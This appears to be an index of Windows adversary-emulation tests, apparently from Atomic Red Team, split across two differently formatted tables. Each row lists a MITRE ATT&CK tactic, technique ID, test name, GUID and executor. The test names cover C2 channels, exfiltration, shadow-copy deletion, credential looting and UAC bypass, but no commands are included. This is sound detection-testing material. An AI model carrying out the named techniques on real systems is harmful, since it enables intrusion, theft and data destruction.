discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt
discovery,T1016,System Network Configuration Discovery,9,DNS Server Discovery Using nslookup,34557863-344a-468f-808b-a1bfb89b4fa9,command_prompt
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
discovery,T1482,Domain Trust Discovery,4,Adfind - Enumerate Active Directory OUs,d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec,command_prompt
discovery,T1482,Domain Trust Discovery,5,Adfind - Enumerate Active Directory Trusts,15fe436d-e771-4ff3-b655-2dca9ba52834,command_prompt
discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c-5991-4b19-aaf5-7cc2fe298c5d,powershell
discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
discovery,T1482,Domain Trust Discovery,8,TruffleSnout - Listing AD Infrastructure,ea1b4f2d-5b82-4006-b64f-f2845608a3bf,command_prompt
discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
discovery,T1049,System Network Connections Discovery,4,System Discovery using SharpView,96f974bb-a0da-4d87-a744-ff33e73367e9,powershell
discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,4,SharpHound3 - LocalAdmin,e03ada14-0980-4107-aff1-7783b2b59bb1,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,5,Wmic Group Discovery,7413be50-be8e-430f-ad4d-07bf197884b2,powershell
discovery,T1069.001,Permission Groups Discovery: Local Groups,6,WMIObject Group Discovery,69119e58-96db-4110-ad27-954e48f3bb13,powershell
discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
discovery,T1201,Password Policy Discovery,10,Use of SecEdit.exe to export the local security policy (including the password policy),510cc97f-56ac-4cd3-a198-d3218c23d889,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1012,Query Registry,2,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
discovery,T1518.001,Software Discovery: Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt
discovery,T1018,Remote System Discovery,4,Remote System Discovery - ping sweep,6db1f57f-d1d5-4223-8a66-55c9c65a9592,command_prompt
discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5-0447-4be4-944a-1f8530ed6574,command_prompt
discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell
command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1105,Ingress Tool Transfer,7,certutil download (urlcache),dd3b61dd-7bbc-48cd-ab51-49ad1a776df0,command_prompt
command-and-control,T1105,Ingress Tool Transfer,8,certutil download (verifyctl),ffd492e3-0455-4518-9fb1-46527c9f241b,powershell
command-and-control,T1105,Ingress Tool Transfer,9,Windows - BITSAdmin BITS Download,a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download,42dc4460-9aa6-45d3-b1a6-3955d34e1fe8,powershell
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt
impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with ConfigSecurityPolicy,5568a8f4-a8b1-4c40-9399-4969b642f122,powershell
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 1 Rundll32 execute JavaScript Remote Payload With GetObject 57ba4ce9-ee7a-4f27-9928-3c70c489b59d command_prompt
3 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 2 Rundll32 execute VBscript command 638730e7-7aed-43dc-bf8c-8117f805f5bb command_prompt
4 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 3 Rundll32 execute VBscript command using Ordinal number 32d1cf1b-cbc2-4c09-8d05-07ec5c83a821 command_prompt
5 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 4 Rundll32 advpack.dll Execution d91cae26-7fc1-457b-a854-34c8aad48c89 command_prompt
6 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 5 Rundll32 ieadvpack.dll Execution 5e46a58e-cbf6-45ef-a289-ed7754603df9 command_prompt
7 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 6 Rundll32 syssetup.dll Execution 41fa324a-3946-401e-bbdd-d7991c628125 command_prompt
8 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 7 Rundll32 setupapi.dll Execution 71d771cd-d6b3-4f34-bc76-a63d47a10b19 command_prompt
9 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 8 Execution of HTA and VBS Files using Rundll32 and URL.dll 22cfde89-befe-4e15-9753-47306b37a6e3 command_prompt
10 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 9 Launches an executable using Rundll32 and pcwutl.dll 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 command_prompt
11 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 10 Execution of non-dll using rundll32.exe ae3a8605-b26e-457c-b6b3-2702fd335bac powershell
12 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 11 Rundll32 with Ordinal Value 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0 command_prompt
13 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 12 Rundll32 with Control_RunDLL e4c04b6f-c492-4782-82c7-3bf75eb8077e command_prompt
14 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 13 Rundll32 with desk.cpl 83a95136-a496-423c-81d3-1c6750133917 command_prompt
15 defense-evasion T1216.001 Signed Script Proxy Execution: Pubprn 1 PubPrn.vbs Signed Script Bypass 9dd29a1f-1e16-4862-be83-913b10a88f6c command_prompt
16 defense-evasion T1006 Direct Volume Access 1 Read volume boot sector via DOS device path (PowerShell) 88f6327e-51ec-4bbf-b2e8-3fea534eab8b powershell
17 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
18 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
19 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
20 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
21 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
22 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
23 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
24 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
25 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
26 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
27 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
28 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
29 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
30 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
31 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
32 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
33 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
34 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 18 WinPwn - UAC Magic 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc powershell
35 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 19 WinPwn - UAC Bypass ccmstp technique f3c145f9-3c8d-422c-bd99-296a17a8f567 powershell
36 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 20 WinPwn - UAC Bypass DiskCleanup technique 1ed67900-66cd-4b09-b546-2a0ef4431a0c powershell
37 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 21 WinPwn - UAC Bypass DccwBypassUAC technique 2b61977b-ae2d-4ae4-89cb-5c36c89586be powershell
38 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key 251c5936-569f-42f4-9ac2-87a173b9e9b8 powershell
39 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 23 UAC Bypass with WSReset Registry Modification 3b96673f-9c92-40f1-8a3e-ca060846f8d9 powershell
40 defense-evasion T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
